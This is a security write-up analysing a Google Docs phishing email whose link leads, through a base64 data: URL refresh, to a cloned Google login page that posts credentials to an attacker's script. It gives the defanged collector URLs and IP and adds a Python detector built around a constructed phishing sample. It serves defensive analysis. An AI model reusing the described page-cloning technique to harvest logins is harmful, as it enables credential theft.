Google docs phishing Email analysis

Recently I received an email claiming that a friend had shared an important Google Doc with me and asking me to click the attached link to access it. I have HTML rendering turned off in my email client, so the raw link was plainly visible; unsurprisingly, it pointed neither to Google Drive nor to any other Google product.

The link simply redirects the user to an imposter Google account login page. A user who falls for it ends up handing their Google login details to the attacker. Further analysis follows.

The link in the email is hxxp://zhangjiancheng.com/include/read.php, which resolves to IP 66.212.29.178, hosted by Secured Private Network, Santa Ana, CA. Requesting that URL returns an HTML page containing a <META http-equiv="refresh" content="0;URL=data:text/html;base64,..."> tag, with the actual page content Base64 encoded inside the data: URL. Decoding that content and diffing it against the original Google account login page shows that the only major change is the URL to which the form data is submitted, in this case hxxp://zhangjiancheng.com/include/other.php. To test further, I entered fake details in the username and password fields and submitted the form. I was served a Google Drive page stating that the requested file does not exist.
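The two indicators described above (a META refresh into a base64 data: URL, and a login form whose action is not a Google host) can be checked automatically. The following script is an added example, not the author's code; the landing page it inspects is a constructed miniature of the one described, and the trusted-host list is an assumption.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the post: the outer page is only a META refresh to a
# base64 data: URL; the inner page is a cut-down login form posting to the collector script.
INNER_PAGE = (b'<html><body><form method="post" action="http://zhangjiancheng.com/include/other.php">'
              b'<input name="Email"><input name="Passwd" type="password"></form></body></html>')
LANDING_PAGE = ('<html><head><META http-equiv="refresh" content="0;URL=data:text/html;base64,'
                + base64.b64encode(INNER_PAGE).decode() + '"></head></html>')

# A refresh whose target is an inline base64-encoded HTML document.
META_RE = re.compile(r'content\s*=\s*["\']?\s*\d+\s*;\s*url\s*=\s*data:text/html;base64,'
                     r'([A-Za-z0-9+/=]+)', re.I)

class FormActionParser(HTMLParser):
    # Collects the action attribute of every <form> (HTMLParser lower-cases tags and attrs).
    def __init__(self):
        super().__init__()
        self.actions = []
    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions += [v for k, v in attrs if k == "action" and v]

def extract_embedded_page(html):
    """Decoded inner page if the outer page is a base64 data: refresh, else None."""
    m = META_RE.search(html)
    return base64.b64decode(m.group(1)).decode("utf-8", "replace") if m else None

def form_actions(html):
    p = FormActionParser()
    p.feed(html)
    return p.actions

def is_google_host(url, trusted=("google.com",)):
    # google.com or a subdomain only; a relative action inside a data: document has no origin.
    host = (urlparse(url).hostname or "").lower()
    return any(host == t or host.endswith("." + t) for t in trusted)

def analyse(html):
    """Flag the data: refresh wrapper and any inner form posting outside Google."""
    findings = []
    inner = extract_embedded_page(html)
    if inner is None:
        return findings
    findings.append("meta refresh to base64 data: URL")
    for action in form_actions(inner):
        if not is_google_host(action):
            findings.append("login form posts to %s" % urlparse(action).hostname)
    return findings
```

Run analyse() over a fetched response body; an empty list means neither indicator was present.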

[Figure: Google Drive redirect page. Google Drive page served after entering login details.]

Such spam emails highlight the fact that most users do not check the browser's address bar. In the screenshot below it can be clearly seen that the address in the address bar is not that of Google Accounts, which should raise doubt. Checking the URL in the address bar can save you from such phishing attacks.

[Figure: Login page. Fake Google login page; check the address bar.]
